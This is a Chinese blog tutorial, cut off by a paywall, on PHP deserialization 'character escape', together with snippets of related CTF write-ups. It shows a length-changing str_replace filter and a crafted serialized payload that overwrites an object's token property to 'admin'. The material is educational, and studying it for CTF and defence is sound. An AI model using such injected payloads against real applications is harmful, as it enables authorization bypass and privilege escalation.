反序列化字符逃逸问题

最新推荐文章于 2025-03-19 18:00:34 发布
最新推荐文章于 2025-03-19 18:00:34 发布
阅读量280 收藏 1
点赞数
分类专栏: 反序列化
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/Whaocai/article/details/119532692
版权
本文探讨字符逃逸的本质,涉及替换后字符长度变化的两种情况。通过示例代码解释了如何利用字符逃逸在反序列化过程中间接修改属性值,详细阐述了长度增加和减少时的利用方法,并给出具体payload实现修改属性值的过程。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

字符逃逸的本质是替换后字符长度发生了改变。
两种情况:①替换后字符长度增加②替换后字符长度减少
漏洞利用:间接修改属性的值
①替换后字符串长度增加
示例代码

class message{
   
    public $from;
    public $msg;
    public $to;
    public $token='user';
    public function __construct(){
   
        $this->from = 'fuck';
        $this->msg = 1;
        $this->to = 1;
    }
}
function filter($a){
   
	return str_replace('fuck','admin',$a);
}
$u=serialize(new message());
$us=filter($u);
echo $u;
echo $us;
#$a='O:7:"message":4:{s:4:"from";s:265:"adminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadmin";s:3:"msg";i:1;s:2:"to";i:1;s:5:"token";s:5:"admin";}";s:3:"msg";i:1;s:2:"to";i:1;s:5:"token";s:4:"user";}';
var_dump(unserialize($a));

能利用字符逃逸漏洞干什么?可用来间接修改其他属性的属性值。

替换前:O:7:"message":4:{
   s:4:"from";s:4
最低0.47元/天 解锁文章
浅析php反序列化字符逃逸
Lemon's blog
08-26 3269
前言: php反序列化字符逃逸之前没有详细的学习过,所以遇到题目看的有点懵,这次好好学习一下。 反序列化的特点 首先要了解一下反序列化的一些特点: php在反序列化时,底层代码是以 ; 作为字段的分隔,以 } 作为结尾,并且是根据长度判断内容的 ,同时反序列化的过程中必须严格按照序列化规则才能成功实现反序列化 。 class A{ public $name='shy'; public $pass='123456'; } $lemon = new A(); echo serialize
CTF之php反序列化字符逃逸
世间繁华梦一出
06-08 507
首先源代码如下 <?php include_once 'flag.php'; highlight_file(__FILE__); // Security filtering function function filter($str){ return str_replace('secure', 'secured', $str); } class Hacker{ public $username = 'margin';
php反序列化学习之字符逃逸
竹盐笙熙的博客
02-13 1375
学习一下php反序列化字符逃逸的知识点
WEB攻防-PHP反序列化-字符逃逸
最新发布
weixin_45534587的博客
03-19 1025
1.PHP在反序列化时,语法是以;作为字段的分隔,以} 作为结尾,在结束符之后的任何内容不会影响反序列化的后的结果classpeoplepublic$namelili;s:2:"20";2.根据长度判断内容s:4:"lils:3:"age";s:2:"20";其中lil是name的值3.其中字符串必须以双引号包裹,不能不写或以单引号包裹;注意。
php反序列化字符逃逸
2301_80913334的博客
03-30 1911
字符增多逃逸:第一个字符串增多吐出多余代码,把多余位代码构造成逃逸的成员属性,构造出一个逃逸成员属性字符减少逃逸:第一个字符串减少吃掉有效代码,在第二个字符串构造代码,多逃逸出一个成员属性做题顺序:1、找目标;2、构造所需的有效代码;3、将构造出的有效代码作为值赋值给属性。
反序列化字符逃逸
qq_63928796的博客
07-04 477
序列化:函数 : serialize()把复杂的数据类型压缩到一个字符串中 数据类型可以是数组,字符串,对象等序列化一个对象将会保存对象的所有变量,但是不会保存对象的方法,只会保存类的名字。反序列化:函数: unserialize()恢复原先被序列化的变量 三个属性 public:表示全局,类内部外部子类都可以访问private:表示私有,只有本类内部可以访问protected:表示受保护的,只有本类或者子类中可以访问 特点 php在反序列化时,底层代码是以;作为字段的分隔,以}作为结尾(字符
php反序列化学习——字符逃逸
m0_73756016的博客
03-13 1468
如果我们通过构造使其里面的内容为'hkhk";s:4:"pass";s:xx:"' 这样我们通过构造可控变量pass的值 让它后面变成s:3:"vip";这里的思路也是通过构造让后面的k变成‘ ";s:4:"pass";这里user的字符串已经从flagflag 替换成了hkhk 但是字符串长度还是8 这样 他就会以为user里面的内容为‘hkhk";s:4:"pass";}就会结束 就相当于后面s:1:"b";s:4:"pass";
php反序列化字符逃逸xss
01-29
### PHP 反序列化中的字符逃逸与 XSS 攻击 #### 防御措施 为了防止通过反序列化操作引发的安全风险,尤其是针对XSS攻击,应当采取严格的输入验证机制。任何来自用户的输入都应被视作潜在威胁并加以过滤和消毒处理...
php反序列化逃逸
m0_63416413的博客
04-25 560
ctf反序列化逃逸,结合代码和ctf题目
php反序列化长度变化尾部字符逃逸(0CTF-2016-piapiapia)
10-15
【PHP反序列化长度变化尾部字符逃逸】是一种安全漏洞利用技术,通常出现在使用PHP的系统中。在PHP中,对象序列化是将对象转换为可存储或传输的字符串的过程,而反序列化则是将这个字符串恢复为原始对象的过程。...
PHP:反序列化中的字符逃逸
有时候,想要一块二向箔
12-09 472
首先,对于序列化和反序列化还不太理解的话看看以下链接: PHP中序列化与反序列化 JAVA中的序列化与反序列化 简单来说: 在PHP中 序列化 将变量或对象转换成字符串的过程。 反序列化字符串转换成变量或对象的过程。 就是对数据处理的两种互逆过程 下面以一道题目来进行讲解反序列化中的字符逃逸 题目链接:bugku-newphp 打开后页面展示源码 <?php // php版本:5.4.44 header("Content-type: text/html; charset=utf-8"); hig
PHP反序列化字符逃逸
blue_fantasy的博客
01-09 579
Text. 0x00 前提 掌握PHP反序列化的原理,序列化的对应内容及POP链构造。可参看: https://xz.aliyun.com/t/3674,https://xz.aliyun.com/t/6454 PHP的反序列化特点: 01.PHP 在反序列化时,底层代码是以 ; 作为字段的分隔,以 } 作为结尾(字符串除外),并且是根据长度判断内容的 ,同时反序列化的过程中必须严格按照序列化规则才能成功实现反序列化 。例如下图超出的abcd部分并不会被反序列化成功。 02.当长度不对应的时
php反序列化字符逃逸
leekos的博客,分享web安全相关知识~
01-04 1499
php反序列化字符逃逸
php反序列化--字符逃逸
YkingH的博客
03-14 5189
php反序列化字符逃逸 PHP反序列化字符逃逸,一共分有两种情况,情况一:过滤后字符串变多,情况二:过滤后字符变少(本篇文章默认已有反序列化相关知识基础) 过滤后字符串变多 以ctfshow-web262为例讲解: error_reporting(0); class message{ public $from; public $msg; public $to; public $token='user'; public function __construct(
php反序列化字符逃逸
weixin_47813861的博客
10-08 321
最近回顾了几道php反序列化的基础题,就随便写一类个人比较中意的题型——字符逃逸。 这里以ctfshow262为例。 有两部分源码 index.php <?php error_reporting(0); class message{ public $from; public $msg; public $to; public $token='user'; public function __construct($f,$m,$t){ $this-&
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值